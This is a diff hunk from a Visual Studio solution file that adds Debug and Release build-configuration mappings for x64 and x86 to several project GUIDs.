@@ -23,14 +25,22 @@ Global
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x64.Build.0 = Release|x64
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.ActiveCfg = Release|Win32
{9C556697-73D5-47E2-908C-B285CB253CC6}.Release|x86.Build.0 = Release|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.ActiveCfg = Debug|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x64.Build.0 = Debug|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.ActiveCfg = Debug|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Debug|x86.Build.0 = Debug|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.ActiveCfg = Release|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x64.Build.0 = Release|x64
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.ActiveCfg = Release|Win32
{C7E129B4-8A7E-4E5C-A259-573609675FED}.Release|x86.Build.0 = Release|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.ActiveCfg = Debug|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x64.Build.0 = Debug|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.ActiveCfg = Debug|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Debug|x86.Build.0 = Debug|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.ActiveCfg = Release|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x64.Build.0 = Release|x64
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.ActiveCfg = Release|Win32
{81F05638-72B8-41DA-B80A-4F292961D9A1}.Release|x86.Build.0 = Release|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.ActiveCfg = Debug|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x64.Build.0 = Debug|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.ActiveCfg = Debug|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Debug|x86.Build.0 = Debug|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.ActiveCfg = Release|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x64.Build.0 = Release|x64
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.ActiveCfg = Release|Win32
{0299D361-D3F7-419A-AB93-FB36642C97FA}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE